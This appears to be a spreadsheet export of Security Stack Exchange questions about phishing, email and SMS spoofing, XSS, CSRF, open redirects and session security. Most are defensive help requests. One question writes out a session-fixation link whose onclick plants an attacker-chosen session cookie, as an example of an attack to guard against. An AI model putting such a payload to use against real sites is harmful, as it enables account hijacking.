 X-Email-Count: 37
 X-Source-Cap: [redacted, unsure if safe to include]
 X-Local-Domain: yes
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Reading &lt;a href="https://cybersecurity.att.com/blogs/security-essentials/how-hackers-manipulate-email-to-defraud-you-and-your-customers" rel="nofollow noreferrer"&gt;this page&lt;/a&gt;, the &lt;em&gt;Return-Path&lt;/em&gt; and &lt;em&gt;Received-SPF&lt;/em&gt; appear to be fine and I don't appear to have any &lt;em&gt;X-Sender&lt;/em&gt; headers, however &lt;em&gt;do&lt;/em&gt; have a &lt;em&gt;X-Source-Sender&lt;/em&gt; that doesn't look right?&lt;/p&gt;
 &lt;p&gt;Because they appear to have been able to reply to an actual email thread I had with the other real user, is one of our devices infected? How were they able to send this?&lt;/p&gt;
 &lt;p&gt;It appears to be this scam:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://blogs.k-state.edu/scams/2020/01/31/phishing-scam-01-31-2020-re-03-25-2018-password-change-deadline-for-eid/" rel="nofollow noreferrer"&gt;https://blogs.k-state.edu/scams/2020/01/31/phishing-scam-01-31-2020-re-03-25-2018-password-change-deadline-for-eid/&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;However the content of the new email ends where they mention the password.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;spam&gt;&lt;email-spoofing&gt;&lt;spf&gt;&lt;dkim&gt;</t>
  </si>
  <si>
    <t>How to make sure my web application is secured?</t>
  </si>
  <si>
    <t>&lt;p&gt;My backend is hosted on AWS-EC2 running ruby on rails.
 My frontend is hosted on aws-s3 using angular-js.
 My DB is MongoDB.&lt;/p&gt;
 &lt;p&gt;All APIs have an authentication token for user security. Every server is https enabled with cloud-front aws. My backend have only 80/443 port opened, and 22 for my private IP. 
 My clients ask me about the security features of this iot-system.
 What are the habits that I need to keep in mind to make the system secure from external threats?&lt;/p&gt;
 &lt;p&gt;External threats include someone hacking the data on my DB?
 someone stealing user account details/credentials using phishing?
 DNS spoofing?&lt;/p&gt;
 &lt;p&gt;P.S.: I use CloudFront for SSL certificates and they route my data using https, convert all connections from HTTP to https. All of my stacks is on AWS from DNS to my frontend. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-application&gt;&lt;server&gt;&lt;aws&gt;</t>
  </si>
  <si>
    <t>Can CSRF protection work even if an XSS vulnerability exists?</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;strong&gt;Need for CSRF protection that withstands an XSS attack&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;One of the big dangers of XSS is that it can often bypass CSRF protection and thus perform any action the victim can perform. &lt;/p&gt;
 &lt;p&gt;If it would be possible to prevent CSRF even if an XSS vulnerability exists, it seems that that would greatly mitigate the damage XSS can do. Because of httpOnly, it may not be possible to steal cookies, which would leave an attacker with phishing attacks, defacement , and reading out data that is accessible to the client.&lt;/p&gt;
 &lt;p&gt;But OWASP says that it is not possible to prevent CSRF once an XSS vulnerability exists.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Using referrer check for proper CSRF protection?&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Shouldn't it be possible to use referrer checks as CSRF protection which work even if an XSS vulnerability exists?&lt;/p&gt;
 &lt;p&gt;Of course a domain check would not be enough. But wouldn't it work if the exact script is checked?&lt;/p&gt;
 &lt;p&gt;For example, if a request is sent from &lt;code&gt;http://example.com/add-user.php&lt;/code&gt;, it would be required that the referrer is &lt;code&gt;http://example.com/add-user.php&lt;/code&gt;. &lt;/p&gt;
 &lt;p&gt;This still means that an attacker can perform CSRF on that script, if that script contains an XSS vulnerability, but no CSRF attacks on different scripts on the same domain should be possible, as referrers cannot be set via JavaScript.&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Referrer checks may not always be practical (for example, because the client doesn't send referrers), but if they are used, could they be used in such a way? &lt;/li&gt;
 &lt;li&gt;If they can be used like this, are there major downsides to this approach?&lt;/li&gt;
 &lt;li&gt;If not, could there theoretically be a CSRF protection that works if an XSS vulnerability exists?&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;web-application&gt;&lt;xss&gt;&lt;csrf&gt;</t>
  </si>
  <si>
    <t>Possible Phishing Attempt?</t>
  </si>
  <si>
    <t>&lt;p&gt;I use an iPhone. Today I got a text from an unknown number starting from +65. The message was "your one-time Wifi password is xxxx and it‚Äôs valid for only 10 minutes". Thought it was a scam and deleted the text. &lt;/p&gt;
 &lt;p&gt;After an hour or so, my Wifi on my phone got disconnected followed by a pop up saying that password for Wifi is incorrect and asking for the password. I ignored it and immediately turned off Wifi on my phone. Then I used my laptop to login to my modem and changed the Wifi password, and then the phone got connected to Wifi again using the new password.&lt;/p&gt;
 &lt;p&gt;I‚Äôve been checking my bank accounts and no suspicious activity so far (I‚Äôve enabled Touch ID for banking apps) but I‚Äôm just thinking how my phone was disconnected from the Wifi and asking for the new password, when clearly the Wifi password hadn‚Äôt been changed (my laptop was able to connect to Wifi with the old password). &lt;/p&gt;
 &lt;p&gt;Did someone actually hack into my phone and changed the Wifi password and expected me to enter the password sent in the text?&lt;/p&gt;
 &lt;p&gt;Any advice would be appreciated as I‚Äôm concerned about my bank accounts now.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;wifi&gt;&lt;mobile&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Could a phishing page generate a genuine session with the targeted service?</t>
  </si>
  <si>
    <t>&lt;p&gt;At the end of &lt;a href="http://xeushack.com/phishing-with-a-rogue-wifi-access-point" rel="nofollow noreferrer"&gt;this tutorial&lt;/a&gt; the author gives a few ideas for improving a basic phishing attack. &lt;/p&gt;
 &lt;p&gt;One of them intrigued me, in particular: Is it possible to use the credentials that a victim enters in your phishing page and use, say Facebook's or Twitter's (or whichever) API and send those credentials to the actual service, hence creating a genuine session so that the victim never realized that they've been phished?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Is this a phishing link?</t>
  </si>
  <si>
    <t>&lt;p&gt;I saw the link below on a Facebook group and someone commented that it's a phishing link. I checked the domain info and found that its owned by Facebook but I am not sure if that information's trustworthy. So please tell me if it's safe to open it?&lt;/p&gt;
 &lt;p&gt;The links was: &lt;br&gt;&lt;code&gt;https://lookaside.fbsbx.com/file/ScheduleforGATE17%20%28modified%29.pdf?token=AWxCUR8U84mktJ0xpKwdqePJLLRT9dabZhYmFbL-GnVvyoVJT_veNLO2swRQOelWDkGEfPw38PLyM-7U6iin-ng9vwB-HX4QPBP-QhouuRhePuobFE6zGc9HFWSlK0-46ratVPHxqBK7DdE_v0jZweE_uI4pbk-n8dDfpKUzP0R71Q&lt;/code&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>Stop Coding here</t>
  </si>
  <si>
    <t>Is it possible for old text messages to be used in an SMS spoofing attempt?</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;strong&gt;Background&lt;/strong&gt;&lt;br&gt;
 The company I work for maintains an application that allows users to subscribe to notifications via SMS or email. SMS messages are sent to the user's SMS gateway as an email. &lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;The Issue&lt;/strong&gt;&lt;br&gt;
 Recently one of our users contacted us about a suspicious SMS he received that had the contant of an SMS message from three years ago. The only difference was that there was an obvious phishing attempt added to the end of the message. We checked our server logs and message audit log and our system did not have any record of the offending message. &lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Questions&lt;/strong&gt;&lt;br&gt;
 We are trying to be vigilant and follow up on this issue. Our current questions are:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;&lt;p&gt;How can we know whether this is a SMS spoof attempt that originated from our end or the user's end? &lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;How can we inspect the metadata of an SMS message? Is it safe to even forward that SMS message to another email for further investigation?&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Is anyone familiar of similar SMS spoofing attempts involving old SMS alerts?&lt;/p&gt;&lt;/li&gt;
 &lt;/ol&gt;</t>
  </si>
  <si>
    <t>Is SiteKey a valid defense against Phishing?</t>
  </si>
  <si>
    <t>&lt;p&gt;As described &lt;a href="https://security.stackexchange.com/questions/26332/what-is-this-authentication-method-approach-called"&gt;here&lt;/a&gt;, some banks use a SiteKey mechanism in an attempt to provide a defense against phishing. (This is a scheme where the user is shown a personalized image (each user has their own custom image) after the user enters their username but before they enter their password. In theory, this is supposed to let the user verify they are on BOA's page, not on a phishing site.) 
 The comments and answers indicate some issues with this approach, but that question wasn't about whether or not the approach is effective.&lt;/p&gt;
 &lt;p&gt;For future visitors who might be considering using the same scheme, I'd like to have the question on the site:&lt;/p&gt;
 &lt;p&gt;Is this a valid defense against Phishing? Perhaps not by itself, but as one step in a defense-in-depth strategy, or does this give a false sense of security? If so, is it just useless, or is it &lt;strong&gt;&lt;em&gt;more&lt;/em&gt;&lt;/strong&gt; dangerous to employ this scheme &lt;em&gt;because&lt;/em&gt; of the false sense of security?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;phishing&gt;&lt;sitekey&gt;</t>
  </si>
  <si>
    <t>Suspicious redirect in Chrome</t>
  </si>
  <si>
    <t>&lt;p&gt;I was online and one of the sites randomly redirected to a site called mcafeesecurity.application-center.club. It was talking about how my mcafee has expired (my subscription is current). I scanned my computer with malwarebytes and mcafee (both full scans and nothing was found). Does anyone have any idea what this is? I know it is a scam site, but I need to know the type of virus/malware/phishing attempt I am dealing with.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;virus&gt;&lt;url-redirection&gt;&lt;spyware&gt;</t>
  </si>
  <si>
    <t>Mail server security: Mails to internal receivers with faked sender address</t>
  </si>
  <si>
    <t>&lt;p&gt;I noticed that I am able to send emails from my company's mail server to internal receivers from faked inhouse sender addresses without problem and I'm wondering if this should be supposed a security issue or not. &lt;/p&gt;
 &lt;p&gt;I wrote a little python script to connect to the server and send a mail from personA@company.com to personB@company.com and that mail was delivered without any problems. Sometimes it was marked as spam, sometimes not. After a few e-mails, the sending server got blocked because of poor reputation.
 So my question is: Is this really expected behaviour? &lt;/p&gt;
 &lt;p&gt;I would expect that such a setup is ideal for sending phishing or spamming mails to employees of that particular organization. Of course, I do understand that you should be able to connect to an smtp server from outside to send mails to local receivers, otherwise no mails could be delivered. But is it really common that there is no kind of verification of the sender address or that it is so weak?&lt;/p&gt;
 &lt;p&gt;A member of the IT-Department didn't seem suprised when I talked to him about that issue and told me that this was quite normal behaviour. This post suggests that he is right: &lt;a href="https://security.stackexchange.com/questions/17961/issues-with-using-a-mail-server-that-doesnt-support-authentication-to-send-mail"&gt;Issues with using a mail server that doesn&amp;#39;t support authentication to send mail?&lt;/a&gt;. So I checked if I could do the same with my (security-aware) mail-provider: The client got blocked before it could even send the mail, and client and receiver address, both my regular mail addresses, were rejected. That's what I would expect from a correctly configured server. Am I wrong here? Is it really negligible?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;email&gt;&lt;smtp&gt;</t>
  </si>
  <si>
    <t>Guidelines for preventing HTML injection</t>
  </si>
  <si>
    <t>&lt;p&gt;We have a tell-a-friend feature on our website where we present a form to the user for recipient email and personal message. The personal message is added to our email template. The email is sent on behalf of our website. Our form looks like this&lt;/p&gt;
 &lt;p&gt;&lt;img src="https://i.stack.imgur.com/NUMNE.png" width="300"&gt;&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;What checks should we make to ensure that an malicious person cannot hack it and use it for its own/something else's publicity?&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Recently, we had a case of¬†email fraud¬†where a malicious user was able to inject some html code in the input box provided for typing personal message. The received email contained a totally new email template (and our template at the bottom) and HTTP links to other sites.&lt;/p&gt;
 &lt;p&gt;Please add to the below points&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Regex check for URLs and do-not-send URLs&lt;/li&gt;
 &lt;li&gt;?&lt;/li&gt;
 &lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;injection&gt;&lt;websites&gt;</t>
  </si>
  <si>
    <t>Moving to a New Network: First Steps</t>
  </si>
  <si>
    <t>&lt;p&gt;I will be moving a new location in a short time, which means all of my devices will be coming with me.&lt;/p&gt;
 &lt;p&gt;My landlord is the kind of older person who needs help connecting to WiFi. Despite this, she manages to use a number of devices which connect to the internet: TV, phone, Kindle, computer, tablet... When I recently talked to her, it became evident that she did not understand the risks of clicking links in her many questionable emails. Naturally, she's happy to put me in charge of making sure everything works (but that's another discussion...).&lt;/p&gt;
 &lt;p&gt;In the interest of my own devices, what &lt;strong&gt;general&lt;/strong&gt; first steps are advisable to take to secure this unfamiliar network, which could have any number of undetected threats? I'm planning on changing passwords, installing antivirus, and probably subscribing to a VPN service, but I'd like to &lt;em&gt;specifically&lt;/em&gt; take measures to &lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Determine (as best as possible) that nothing malicious is already residing on the network.&lt;/li&gt;
 &lt;li&gt;Reduce the risk that actions taken by my landlord lead to other devices the network being infected.&lt;/li&gt;
 &lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;network&gt;&lt;wifi&gt;&lt;phishing&gt;&lt;threat-mitigation&gt;</t>
  </si>
  <si>
    <t>Analyzing Received From header of Phishing Email</t>
  </si>
  <si>
    <t>&lt;p&gt;Our organization had received a phishing email some time ago. The phishing email was sent from a Compromised account within the organization. On seeing the header of the email, it has following Received fields:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Received: from SG2PR01MB0944.apcprd01.prod.exchangelabs.com (10.169.100.10) by
  KL1PR01MB0933.apcprd01.prod.exchangelabs.com (10.164.231.11) with Microsoft
  SMTP Server (version=TLS1_2,
  cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id 15.20.156.4 via Mailbox
  Transport; Fri, 27 Oct 2017 09:39:59 +0000
 Received: from SG2PR01MB0459.apcprd01.prod.exchangelabs.com (10.161.6.149) by
  SG2PR01MB0944.apcprd01.prod.exchangelabs.com (10.169.100.10) with Microsoft
  SMTP Server (version=TLS1_2,
  cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id 15.20.178.6; Fri, 27
  Oct 2017 09:39:59 +0000
 Received: from SG2PR01MB1343.apcprd01.prod.exchangelabs.com (10.167.76.21) by
  SG2PR01MB0459.apcprd01.prod.exchangelabs.com (10.161.6.149) with Microsoft
  SMTP Server (version=TLS1_2,
  cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id 15.20.156.4; Fri, 27
  Oct 2017 09:39:58 +0000
 Received: from SG2PR01MB1023.apcprd01.prod.exchangelabs.com (10.169.100.137)
  by SG2PR01MB1343.apcprd01.prod.exchangelabs.com (10.167.76.21) with Microsoft
  SMTP Server (version=TLS1_2,
  cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id 15.20.178.6; Fri, 27
  Oct 2017 09:39:46 +0000
 Received: from SG2PR01MB1023.apcprd01.prod.exchangelabs.com
  ([fe80::1867:203b:f12:380b]) by SG2PR01MB1023.apcprd01.prod.exchangelabs.com
  ([fe80::1867:203b:f12:380b%13]) with mapi id 15.20.0178.007; Fri, 27 Oct 2017
  09:39:46 +0000
 From: xyz &amp;lt;xyz&amp;gt;
 Subject: Notice
 Thread-Topic: Notice
 Thread-Index:
  AdNPBpX5rIMKqJjjTuGn/nek8DrJzgAAAC7wAAAAHRAAAAAUYAAAABTAAAAAFPAAAAAVUAAAABVAAAAAFwAAAAAXYAAAABWQAAAAFPAAAAAagAAAABHQAAAAFDAAAAAUYAAAABVQAAAAFFAAAAATEAAAABRw
 Date: Fri, 27 Oct 2017 15:09:38 +0530
 Message-ID:
  &amp;lt;SG2PR01MB1023229A62F250B921895178A75A0@SG2PR01MB1023.apcprd01.prod.exchangelabs.com&amp;gt;
 Accept-Language: en-US
 Content-Language: en-US
 X-MS-Exchange-Organization-AuthAs: Internal
 X-MS-Exchange-Organization-AuthMechanism: 04
 X-MS-Exchange-Organization-AuthSource:
  SG2PR01MB1023.apcprd01.prod.exchangelabs.com
 X-MS-Has-Attach:
 X-Auto-Response-Suppress: DR, OOF, AutoReply
 X-MS-Exchange-Organization-Network-Message-Id:
  d5ec70e0-6238-44fa-694a-08d51d1ea8d5
 X-MS-Exchange-Organization-SCL: -1
 X-MS-TNEF-Correlator:
 X-MS-Exchange-Organization-RecordReviewCfmType: 0
 x-ms-publictraffictype: Email
 X-Microsoft-Exchange-Diagnostics:
  1;KL1PR01MB0933;27:Ajs/I3flIgzdhgTPkcBiDAtWGGFtnAcLkzCg2qbkKkkaVOYm0bU3qTPq7lPpvRQdDfDu8ZOJ2ApzRS02N2+usY7nLefJJqe/dQHB+Du9lETal7rOXfoYhdwmkWpgTUkF
 X-Microsoft-Antispam-Mailbox-Delivery:
  ex:0;auth:0;dest:I;ENG:(400001000128)(400125000095)(750103)(520011016)(706028)(400001001318)(400125100095)(61617190)(400001002128)(400125200095);
 Content-Type: text/html; charset="us-ascii"
 MIME-Version: 1.0
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Now, the IPs are private IPs. Does this mean that the attacker who had compromised the sending account, was sending the phishing email from our network itself? Meaning the attacker is possibly from our organization itself? &lt;/p&gt;</t>
  </si>
  <si>
    <t>What are the dangers of "style-src: 'unsafe-inline'"?</t>
  </si>
  <si>
    <t>&lt;p&gt;This is a common sight in content security policies:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;style-src 'unsafe-inline'
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I know that this "UI redressing attacks" that can be use for phishing or just defamation. But are there other threats as well? In particular, I am interested in:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Script execution&lt;/li&gt;
 &lt;li&gt;Data exfiltration&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Can a liberal CSP for styles lead to any of those? If so, how?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-application&gt;&lt;content-security-policy&gt;&lt;css&gt;</t>
  </si>
  <si>
    <t>How do online accounts get hacked?</t>
  </si>
  <si>
    <t>&lt;p&gt;How does your typical users run-of-the-mill Facebook/twitter/gmail/AIM/etc account get hacked? Is it simply a matter of a weak password? Are they typically the victim of phishing or other social engineering attacks? Is malware typically involved? Is it the result of compromising the systems holding account credentials? All of the above? What methods do the bad guys employ? What are the prevalent trends in methods used to gain access to these accounts?&lt;/p&gt;
 &lt;p&gt;I see friends get their Facebook or AIM accounts hacked, and without knowing &lt;strong&gt;how&lt;/strong&gt; they were likely hacked, I have no idea how to advise them and can't really explain the nature of the problem to them. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;social-engineering&gt;</t>
  </si>
  <si>
    <t>Worst-case scenario OPEN URL REDIRECTION and why google not covering it in bug bounty</t>
  </si>
  <si>
    <t>&lt;p&gt;OPEN URL REDIRECTION as per in my opinion can be proved very dangerous by crafting attacks such as phishing.&lt;/p&gt;
 &lt;p&gt;But it seems like google thinks it as a very low level bug and does not provide any monetary reward for this. So my question comes here into play what the worst case scenario can happen with open url redirection .&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;1&gt; Can i run some system commands by webpage ? &lt;/p&gt;
  &lt;p&gt;2&gt;If it found in any login page (because login pages mostly redirect
  after entering credentials) which is using HTTP not HTTPS, can the
  user sessions be hijacked or Can the credentials be stolen &lt;/p&gt;
  &lt;p&gt;3&gt; Can the victims traffic be routed as desired (by acting as a proxy
  by malicious user or generally MITM) .&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;In my opinion i know possible attack vectors are &lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;1&gt; Victim can be tricked by phising , &lt;/p&gt;
  &lt;p&gt;2&gt; Root access by serving some browser exploits , &lt;/p&gt;
  &lt;p&gt;3&gt; Victim can be made a part of BOT network by opening a connection to
  some IRC.&lt;/p&gt;
 &lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;web-application&gt;&lt;attacks&gt;&lt;appsec&gt;&lt;attack-vector&gt;&lt;bug-bounty&gt;</t>
  </si>
  <si>
    <t>I'm an idiot. Need help with JavaScript "codebreaking" and analysis</t>
  </si>
  <si>
    <t>&lt;p&gt;I accidentally executed a .js file from a phishing source with Windows Script Host. If possible I really don't want to reformat. If anyone could analyse this file it'd be awesome.&lt;/p&gt;
 &lt;p&gt;I'm running Windows 7, 64bit.&lt;/p&gt;
 &lt;p&gt;You can find the JS file in &lt;a href="https://github.com/volaix/TheScam/tree/master" rel="nofollow noreferrer"&gt;github&lt;/a&gt;. It's around 50,000 chars. A lot of it are dummy functions.&lt;/p&gt;
 &lt;p&gt;Here are &lt;a href="https://www.virustotal.com/en/file/9250b704775cd9dc2756f6cd17eddc1759e1580d16f8cc490c28b2bdefd613ba/analysis/1487143532/" rel="nofollow noreferrer"&gt;Virus scanner results&lt;/a&gt;.&lt;/p&gt;
 &lt;p&gt;Edit: Not a duplicate because the intent of the virus is different to others. Same obfuscation idea, different content.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;javascript&gt;&lt;obfuscation&gt;</t>
  </si>
  <si>
    <t>How to securely ask for additional PII / account verification?</t>
  </si>
  <si>
    <t>&lt;p&gt;Since it's a bad practice to ask users to click on a URL within an email to verify their identity due to phishing concerns, what is the best way to ask a user that additional PII information is necessary? &lt;/p&gt;
 &lt;p&gt;&lt;a href="https://stripe.com/docs/recipes/identity-verification-notifications-for-managed-accounts" rel="nofollow"&gt;The following example from Stripe.com is asking for&lt;/a&gt; an email address, and a subsequent URL to click on. &lt;/p&gt;
 &lt;p&gt;Aside from emailing the end user, what other channels are best for requesting this information?&lt;/p&gt;
 &lt;p&gt;If email is the only choice, what is the best approach to ensure that the user will indeed click on the link and proceed with the verification. Our goal is to limit abandoned carts in the event the user doesn't see or ignores this request. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;identification&gt;&lt;password-reset&gt;</t>
  </si>
  <si>
    <t>Purpose of fraudulent AWS SL/TLS certificate request for my domain</t>
  </si>
  <si>
    <t>&lt;p&gt;I just received an email from AWS re &lt;code&gt;Certificate request for [my personal domain]&lt;/code&gt;.&lt;/p&gt;
 &lt;p&gt;This email asked me to approve this request with a link or forward to a AWS email for validation.&lt;/p&gt;
 &lt;p&gt;Needless to say this request for the cert did not originate for me or anyone acting on my behalf.&lt;/p&gt;
 &lt;p&gt;I am posting here as I have never encountered a situation like this, I dont have any vocabulary to put this kind of attack in context, it seems tangential to a social engineering in the sense I dont see how it could be used in a social engineering attack.&lt;br /&gt;
 I am in the dark and at a loss for how to even google for information about the context for this kind of attack.&lt;/p&gt;
 &lt;p&gt;My specific question is&lt;/p&gt;
 &lt;p&gt;&lt;code&gt;what could the perpetrators of this attack achive if they were able to obtain an aws cert for my domain.&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;Edit: This is not the PKI keys you use for ssh, rather this is a certificate you would use with an aws service like cloudfront&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;aws&gt;&lt;social-engineering&gt;&lt;fraud&gt;</t>
  </si>
  <si>
    <t>I got a pretty lame try to of phising mail, what did they try to do?</t>
  </si>
  <si>
    <t>&lt;p&gt;I just got one of the typical mails that tried to get my interest by bombing me with stuff they know about me, like: They know I like to get money and even know what my first name is.... Or did they even fail to do that?&lt;/p&gt;
 &lt;p&gt;Well the first line simply was:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Dear %%$FirstName%%,&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;So it looks to me they tried to insert something by a placeholder probably expecting to be inserted by a database or so.&lt;/p&gt;
 &lt;p&gt;First I thought maybe it is just because it is blocked by being marked as spam, So first I was pretty excited about how they would inject some malicious stuff tricking the security of my mail provider. So I created a sandbox where I told the provider to "load anyway all external contents".&lt;/p&gt;
 &lt;p&gt;But the first line remained in plaintext:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Dear %%$FirstName%%,&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Well I was a bit confused in the first seconds as I really had no clue how this placing into an email body would lead to anything.&lt;/p&gt;
 &lt;p&gt;So how might they expected this to work?
 A placeholder being part of the emails text that somehow gets replaced after being on the servers of my provider. Did they hope the provider might parse my mails and insert for this place holder my $FirstName ?&lt;/p&gt;
 &lt;p&gt;Or were these guy just somehow pretty stupid?&lt;/p&gt;</t>
  </si>
  <si>
    <t>mulllhausen</t>
  </si>
  <si>
    <t>List of web session attacks and counter measures</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm writing a new website in PHP and I will be using cookies to track user session data. Before I finalize the design, I want to make sure that the site is not vulnerable to attacks. I have written a list of attack methods and came up with countermeasures for each one. Can anyone think of any more attack methods and if so also propose suitable counter measures?&lt;/p&gt;
 &lt;p&gt;A list of all attack methods I could think of:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Guess/bruteforce session cookie&lt;/li&gt;
 &lt;li&gt;Steal session cookie (e.g. if the attacker saves the session cookie to USB)&lt;/li&gt;
 &lt;li&gt;Cross-site scripting&lt;/li&gt;
 &lt;li&gt;Phishing (session fixation)&lt;/li&gt;
 &lt;li&gt;SQL injection&lt;/li&gt;
 &lt;li&gt;HTTP header injection&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;It should be noted that I will be using my own database to store session info - not the PHP standard session functions. When I detect an attack I will run a function called &lt;code&gt;warn_and_halt()&lt;/code&gt; which will log the attack and inform the sysadmin, then halt the session under attack.&lt;/p&gt;
 &lt;p&gt;My countermeasures for each of the above attack types are:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;&lt;p&gt;Rather than using a large integer for the session ID stored in the cookie, I will generate my own random number and then hash it with something like SHA-1 to make it a little harder to guess. Of course the session ID may not be unique if created this way, so I will have to check all of the other session IDs in the database and regenerate if the newly generated session ID already exists. I am confident with this measure.&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;I am assuming the USB will be taken to another computer and the session cookie loaded into another browser. I will be logging the user agent (browser name) for each session. If the user agent changes during the session then I will &lt;code&gt;warn_and_halt()&lt;/code&gt;. I have read of people using the IP address to validate the session ID, but I don't think I will be using this at all since IP addresses can change during a session for completely innocent reasons - for example if the user's router resets and negotiates a new IP with their ISP. &lt;strong&gt;Can anyone suggest more countermeasures here?&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;I will set the session cookie as HTTPonly and also check the domain of incoming cookies. There is not much of what can be done to prevent that happening on a browser in my view - the browser may choose not to comply with the HTTPonly flag - nothing I can do there! &lt;strong&gt;Does anyone know a better way to prevent XSS?&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;I envisage phishing to happen by user "bad" logging into my site, then emailing a link such as &lt;code&gt;&amp;lt;a href='javascript:void(0);' onclick="document.cookie='sessionid=xxxx';document.location='http://mywebsite/'"&amp;gt;&lt;/code&gt; to user "oblivious". This will set a session cookie without "oblivious" knowing it. Then "oblivious" will enter their personal information and user "bad" has this info! I think most browsers will not allow the domain of the new cookie to be set as mywebsite, so "oblivious" is pretty safe. Nevertheless, I will be checking the incoming domain of each cookie to make sure it is for my website. I will definitely use cookies, rather than GET or POST to store the session ID. Also, I will counter session fixation by changing the session ID for every page visited.&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;SQL injection is a problem with much larger scope than stealing session IDs, but I will be countering it in general by always escaping the incoming data (including from cookies) and by filtering out any wrong characters with regex. I think I have this one pretty well covered.&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;I just learned about HTTP header injection. Nevertheless, it seems pretty easy to counter - just escape the incoming header fields - especially for carriage returns and validate incoming headers.&lt;/p&gt;&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;So those are all of the attacks and countermeasures I could think of (after a fair bit of reading online). If you see any that I have missed, please respond. If you see that any of my countermeasures is insufficient, please tell.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-browser&gt;&lt;php&gt;&lt;attacks&gt;&lt;http&gt;&lt;web-service&gt;</t>
  </si>
  <si>
    <t>URL &amp; address bar spoofing, only possible on rogue access point</t>
  </si>
  <si>
    <t>&lt;p&gt;Have been playing around with the whole DNS spoofing thing. How can a rogue/phishing URL be masked with a legitimate URL in the address bar (without using images)? I was under the impression that this was doable, but so far the only way to pull this off is with superimposed JavaScript images. &lt;/p&gt;
 &lt;p&gt;I managed to trick my own browser by modifying the hosts file on my Mac and pointing twitter.com to a localhost site. Is it therefore safe to assume that modifying a hosts file on a rogue access point would yield legitimate-looking pages that are actually rogue?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Best way to trace possible root cause of card fraud?</t>
  </si>
  <si>
    <t>&lt;p&gt;I recently had a fraudulent transaction on my debit card (in the UK, where I am based). Having blocked the card, my main concern is to determine how much information has been stolen and how?&lt;/p&gt;
 &lt;p&gt;As this was an online transaction, the fraudster may have needed only superficial information regarding my card to complete the transaction e.g., expiry date, long card number and security code. These details could, theoretically, have been stolen while I used my card in person (at an ATM or while paying for goods) or they could have been stolen via hacking or phishing of myself or someone who has my details, which I would view as a lot more nefarious.&lt;/p&gt;
 &lt;p&gt;When I reported the transaction to my bank, I didn‚Äôt ask whether other auxiliary details were used in the transaction e.g. my DoB, telephone number, security questions which may have been indicative of a wider problem.&lt;/p&gt;
